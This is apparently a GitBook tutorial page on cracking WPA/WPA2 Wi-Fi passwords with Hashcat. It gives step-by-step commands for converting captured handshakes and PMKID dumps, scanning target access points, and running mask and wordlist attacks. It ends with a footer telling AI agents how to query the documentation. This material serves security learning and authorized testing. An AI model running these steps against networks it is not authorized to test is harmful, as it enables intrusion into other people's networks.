# Hashcat Cracking
## Overview
Cracking Wi-Fi passwords using Hashcat is a technique employed to recover the original password from a captured Wi-Fi handshake or PMKID hash. Hashcat is a powerful password recovery tool that utilizes the computational power of GPUs or CPUs to perform brute-force, dictionary, or mask-based attacks. By leveraging various attack modes and wordlists, Hashcat attempts to find the correct password by hashing and comparing it to the captured hash. This process can be time-consuming and resource-intensive, depending on the complexity of the password and the available computing power. It is important to note that cracking Wi-Fi passwords without proper authorization is illegal and unethical.
you can find here the official documentation of Hashcat (and how to use it):
{% embed url="" %}
## Cracking WPA WIFI Handshake
1. converting the cap file
* converting the cap captured file into a hccapx file
```
sudo /usr/share/hashcat-utils/cap2hccapx.bin captured_file.cap wpa2.hccapx
```
* converting the cap captured file into a hc22000 file
```
hcxpcapngtool -o wpa2.hc22000 captured_file.cap
```
2. Cracking the hc22000 file using Hascat
* Check GPU :
```
hashcat -I
```
* Cracking 8 digits WPA WIFI Password
```
hashcat -m 2500 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d?d
```
{% hint style="info" %}
You can press "s" to see the status of the hashing
{% endhint %}
{% hint style="info" %}
to show the cracked password type:
\[the previouse command] --show
{% endhint %}
* Increment from 8 to 20 digits WPA2 WIFI Password
```
hashcat -m 2500 -a 3 wpa2.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```
* Cracking 8 digits WPA WIFI Password (hc22000 method)
```
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```
* Cracking 10 digits WPA WIFI Password (hc22000 method)
```
hashcat -m 22000 wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
```
* Cracking 10 digits and alphabetic (Lowercase and uppercase) WPA WIFI Password (hc22000 method)
```
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1
```
* Increment from 8 to 18 digits WPA2 WIFI Password (hc22000 method)
```
hashcat -m 22000 wpa2.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```
* Increment from 8 to 12 digits and alphabetic (Lowercase and uppercase) WPA2 WIFI Password (hc22000 method)
```
hashcat -m 22000 wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1
```
## Cracking PMKID
1. converting the pcapng captured file into a hc22000 file
```
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
```
{% hint style="info" %}
essidlist: list containing all SSIDs captured previously
hash.hc22000: the new format of the capured file
{% endhint %}
2. finding the mac address of the target WIFI
first, Stop all services accessing the WIFI Network
```
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
```
second, scaning
```
sudo hcxdumptool --do_rcascan -i [interface]
```
finally, you can copy the mac address in any file and complete the steps
{% hint style="info" %}
you can restart the Network services.
if you don't restart it is not a problem but in upcoming work with kali you can face some problem while connecting to the internet.
{% endhint %}
3. Cracking the hc22000 file using Hascat
* cracking the WIFI using a wordlist
```
hashcat -m 22000 hash.hc22000 wordlist.txt
```
{% hint style="info" %}
you can edit the hash.hc22000 file by deleting the unneeded data of other WIFI Network
{% endhint %}
{% hint style="info" %}
you can use any wordlist you want in this command (exemple: rockyou.txt)
{% endhint %}
* brute forcing an 8 digit password WIFI Password
```
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```
* brute forcing an 8 to 18 digit password WIFI Password
```
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
```
## Using GPU Cloud
You can watch [This YouTube Video](https://www.youtube.com/watch?v=nHDixd-EdEQ) created by [David Bombal](https://www.youtube.com/@davidbombal) to learn more about Cracking WIFI using GPU Cloud : how to setup an cloud and how to run the attack
## Other YouTube Tutorials
You can check those YouTube Videos/Tutorials about Hashcat Cracking
* [This YouTube Video](https://www.youtube.com/watch?v=Usw0IlGbkC4) (PMKID Cracking) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=J8A8rKFZW-M) (Brute Force WPA2) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=ZTIB9Ki9VtY) (Brute forcing using powerful GPU) created by [David Bombal](https://www.youtube.com/@davidbombal)
* [This YouTube Video](https://www.youtube.com/watch?v=nHDixd-EdEQ) (Cracking using GPU Cloud) created by [David Bombal](https://www.youtube.com/@davidbombal)
For more details about Password Attacking and Hashcat , Check this Chapter:
{% content-ref url="../password-attacks" %}
[password-attacks](https://hackingforbabies.gitbook.io/en/password-attacks)
{% endcontent-ref %}
{% content-ref url="../password-attacks/hashcat" %}
[hashcat](https://hackingforbabies.gitbook.io/en/password-attacks/hashcat)
{% endcontent-ref %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://hackingforbabies.gitbook.io/en/wifi-cracking/hashcat-cracking.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.